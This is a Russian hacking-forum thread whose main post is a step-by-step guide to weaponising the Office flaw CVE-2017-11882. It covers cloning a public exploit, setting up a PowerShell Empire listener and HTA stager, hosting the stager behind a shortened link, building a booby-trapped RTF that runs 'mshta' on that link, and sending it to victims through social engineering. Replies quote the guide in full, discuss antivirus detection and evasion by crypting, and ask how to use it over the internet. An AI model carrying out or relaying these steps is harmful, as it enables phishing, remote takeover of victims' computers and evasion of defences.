• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья CVE-2017-11882 или Взлом с помощью безобидного документа

Всем привет. Сегодня хочу показать Вам новый эксплоит, с помощью которого мы получим доступ к целевой машине.

Коротко и по делу:

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.

Поехали!

Источник : https://github.com/Ridter/CVE-2017-11882

Установка :

Код:
git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py
На этом все.

Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник : https://github.com/EmpireProject/Empire

Гайд по использованию Empire от DarkNode: https://codeby.net/threads/znakomstvo-s-powershell-empire-framework.58469/
Гайд по HTA что такое и с чем едят : https://codeby.net/threads/malvar-na-html-ili-hta-dlja-xakera.61136/

Собственно говоря, поехали :

Listeners у меня уже есть, что бы их создать, проделаем :
listeners
uselistener http

Далее заполняем нужные поля с помощью set
Пример : set Name http - задать имя листенера http
set Host ip - пишем айпишник куда стучаться вистиму
set Port номер порта - пишем на какой порт стукать
execute - выполнить, создать

Далее у вас появится листенер. Можно вернутся в главное меню с помощью : main

upload_2017-11-22_22-14-40.png


Создание HTA

upload_2017-11-22_21-32-7.png


usestager windows/hta - использовать модуль
info - посмотреть инфу и обычно заполнить Listener
set Listener http (у меня так называется листенер "http")
set OutFile /tmp/hack1.hta - путь к сохранению файла и название
execute - генерим и получаем на выходе

upload_2017-11-22_21-35-44.png


Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

upload_2017-11-22_21-39-56.png


Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

upload_2017-11-22_21-41-18.png


upload_2017-11-22_21-44-23.png


Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

upload_2017-11-22_21-46-21.png


Копируем это батву, идем в каталог где мы установили софт. У меня это :
Код:
cd CVE-2017-11882
Здесь исполняем следующее :
Код:
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf
upload_2017-11-22_21-50-10.png


Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

upload_2017-11-22_21-54-48.png


YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)

Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.

Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.

Результат на nodistribute:

По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Статью пишу первый раз, не судите строго =) Всем профит!
 

Вложения

  • upload_2017-11-22_21-31-29.png
    upload_2017-11-22_21-31-29.png
    18,7 КБ · Просмотры: 2 311
T

tumm

Палится только неслабо
 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
HTA палитсья давно всем чем можно. Рекомендую криптовать ps или другими языками
 
  • Нравится
Реакции: sk3l

PingVinich

Технарь
Green Team
19.03.2017
138
505
BIT
0
Всем привет. Сегодня хочу показать Вам новый эксплоит, с помощью которого мы получим доступ к целевой машине. Коротко и по делу:
Коротко по делу. Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.
Поехали!
Источник : https://github.com/Ridter/CVE-2017-11882
Установка :
1. git clone https://github.com/Ridter/CVE-2017-11882
2. cd CVE-2017-11882
3. chmod +x Command109b_CVE-2017-11882.py
4. chmod +x Command43b_CVE-2017-11882.py

На этом все. Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework
Источник : https://github.com/EmpireProject/Empire
Гайд по использованию Empire от DarkNode: https://codeby.net/threads/znakomstvo-s-powershell-empire-framework.58469/
Гайд по HTA что такое и с чем едят : https://codeby.net/threads/malvar-na-html-ili-hta-dlja-xakera.61136/

Собственно говоря, поехали :
Listeners у меня уже есть, что бы их создать, проделаем :
listeners
uselistener http

Далее заполняем нужные поля с помощью set
Пример : set Name http - задать имя листенера http
set Host ip - пишем айпишник куда стучаться вистиму
set Port номер порта - пишем на какой порт стукать
execute - выполнить, создать

Далее у вас появится листенер. Можно вернутся в главное меню с помощью : main
Посмотреть вложение 13156

Создание HTA
Посмотреть вложение 13145

usestager windows/hta - использовать модуль
info - посмотреть инфу и обычно заполнить Listener
set Listener http (у меня так называется листенер "http")
set OutFile /tmp/hack1.hta - путь к сохранению файла и название
execute - генерим и получаем на выходе
Посмотреть вложение 13146


Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.
Посмотреть вложение 13147

Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :
Посмотреть вложение 13148


Посмотреть вложение 13150


Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:
Посмотреть вложение 13151


Копируем это батву, идем в каталог где мы установили софт. У меня это :
cd CVE-2017-11882
Здесь исполняем следующее :
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf

Посмотреть вложение 13152


Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

Посмотреть вложение 13155

YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)

Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.

Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.

Результат на nodistribute:


По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Статью пишу первый раз, не судите строго =) Всем профит!
Я как раз писал статью, о вредоносных HTA-файлах. Это один из прикладных способов их использования.
 
T

tumm

Причем тут хта,палится сам код эксплойта
 
T

tumm

Причем тут код эксплоита палится нагрузка а не эксплоит. Сам по себе эксплоит это херня.
Во первых-АВ проверка выдает палево на сигнатуру именно эксплойта,это можно увидеть на результате АВ проверки
Exploit.CVE-2017-11882.Gen

В вторых пайлоад стандартный калькулятор у винды =)

P.S. Подтирать мессаги несерьезно )
 
Последнее редактирование модератором:
  • Нравится
Реакции: xkurs0v0d и Hackaton192
H

Hackaton192

Во первых-АВ проверка выдает палево на сигнатуру именно эксплойта,это можно увидеть на результате АВ проверки
Exploit.CVE-2017-11882.Gen

В вторых пайлоад стандартный калькулятор у винды =)

P.S. Подтирать мессаги несерьезно )


Согласен палится по сигнатуре!!До подгрузки payloada
 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
Итак, призываю все группы оценивать статью с помощью систем репутации, "Мне нравится" или комментариев.
Отныне, просто состоять в группе мало для того, чтобы в ней оставаться. Ваша задача, так же наставлять авторов и оценивать их.
Критерии:
Статья достойна репутации +1 балл
Статья отстой и/или не соблюдены правила -1 балл
Статья неплохая, но на репу не катит - поставить лайк - оставить комментарий.
Статья нейтральная не гавно но и не шедевр - оставить комментарий.

Grey
@a113
@AL04E
@Celestial
@d7uk4r3v
@DoberGroup
@ghost
@Ishikawa
@JuicyBrute
@koldonuuchu
@MAdDog719
@nemainthium
@Underwood
@Vertigo
@WIPE
Red
@Dr.Jo.Frink
@Dr.Lafa
@grapf92
@id2746
@IioS
@Ondrik8
@r1991omen
@Sniff
@z3RoTooL
Eleet
@ghostphisher
@kot-gor
@PingVinich
@SooLFaa
@Vander
@~~DarkNode~~
 
  • Нравится
Реакции: Bobos

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Темы такого рода всегда зачет. Преподнес шикарно - картинки, текст, ссылки. Ставлю мне нравится с пожеланиями потому что:
- упустил момент проверить на разных системах и выяснить где палится где не палится.Я вообще за то, если ТС увзял такую тему ( подобную ) стоит заморочить полной проверкой не одной своей стационарке, а как минимум поднять пару виртуалок с разными версиями ОС и АВ. Все мы понимаем - у компаний АВ производящих есть свои каналы "новостей" и такие темы не открывают им с эффектом ВАУ глаза, а для сохранения личного времени читателя вполне пойдет. ТС - продолжай :)
 
O

OneDollar

Темы такого рода всегда зачет. Преподнес шикарно - картинки, текст, ссылки. Ставлю мне нравится с пожеланиями потому что:
- упустил момент проверить на разных системах и выяснить где палится где не палится.Я вообще за то, если ТС увзял такую тему ( подобную ) стоит заморочить полной проверкой не одной своей стационарке, а как минимум поднять пару виртуалок с разными версиями ОС и АВ. Все мы понимаем - у компаний АВ производящих есть свои каналы "новостей" и такие темы не открывают им с эффектом ВАУ глаза, а для сохранения личного времени читателя вполне пойдет. ТС - продолжай :)
Спасибо, учту!:)
 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
Во первых-АВ проверка выдает палево на сигнатуру именно эксплойта,это можно увидеть на результате АВ проверки
Exploit.CVE-2017-11882.Gen

В вторых пайлоад стандартный калькулятор у винды =)

P.S. Подтирать мессаги несерьезно )
Во - первых я не подтирал ни одного поста и посты не удаляются а скрываются из под юзеров(по крайней мере удалять перманенто модеры не могут). А во - вторых резберись наконец в терминологии, что есть эксплоит, а что есть пэйлоад.
В данном случае вся цвешка выступает как НАГРУЗКА. Эксплоит - это код, который эксплуатирует утечку в памяти если это бинарщина, если под веб свою специфику (типа крутилки скули) и так далее. Он не является вредоносной программой, доставка ворда и сигнатуры ворда это уже НАГРУЗКА т.е. payload. Сам эксплоит не может быть нагрузкой.
 
T

tumm

Во - первых я не подтирал ни одного поста и посты не удаляются а скрываются из под юзеров(по крайней мере удалять перманенто модеры не могут). А во - вторых резберись наконец в терминологии, что есть эксплоит, а что есть пэйлоад.
В данном случае вся цвешка выступает как НАГРУЗКА. Эксплоит - это код, который эксплуатирует утечку в памяти если это бинарщина, если под веб свою специфику (типа крутилки скули) и так далее. Он не является вредоносной программой, доставка ворда и сигнатуры ворда это уже НАГРУЗКА т.е. payload. Сам эксплоит не может быть нагрузкой.
Подтирала администрация.Сам головой подумай и разберись что такое пэйлоад а что эксп)Ппц тру хакиры с кодебу немогут отличить пэйлоад от экспа.
 
Последнее редактирование модератором:
T

tumm

Была удалена лексика, недопустимая на codeby. Как в Вашем случае ...
Что именно?Матом не ругался,если человек тупит он хоть админ хоть нет,бред какой -то.С таким отношением-"Админстрация избранная,а все остальные идиоты" вы далеко не уедите.
 
O

OneDollar

Давайте вы продолжите мерится знаниями не под моей темой. Как я понимаю, здесь уже перешли на личное, это не касается моей темы. Для этого есть ТГ лс. Спасибо)
 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
Подтирала администрация.Сам головой подумай и разберись что такое пэйлоад а что эксп)Ппц тру хакиры с кодебу немогут отличить пэйлоад от экспа.
Беда. Причем тут регалии и прочее? Глупые люди думают, что я спорю потому что чувствую силу, что я модератор. На самом деле я никак не оперировал своим статусом на этом форуме. Я в шоке от непонимания что такое эксплоит, а что такое нагрузка. В чем разница между шеллкодом и эксплоитом?! Очень рекомендую книгу "Хакинг: Искусство сплоитинга" - в идеале читать в оригинале, чтобы потом не бегать по форумам и не учить людей в чем не разбираешься.
 
Последнее редактирование:
M

motioncro

Всем привет,
Возможно, мой вопрос покажется немного необдуманным, но все же прошу Вашей помощи!
Почему то не определяет агента, на принимающей машине загружается скрипт, в процессах есть powerShell, а на хосте нет агента?
Инструкция написана для локальной сети, а как быть с внешней? Для меня, как хоста, нужен статический ip, верно?
Спасибо огромное
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!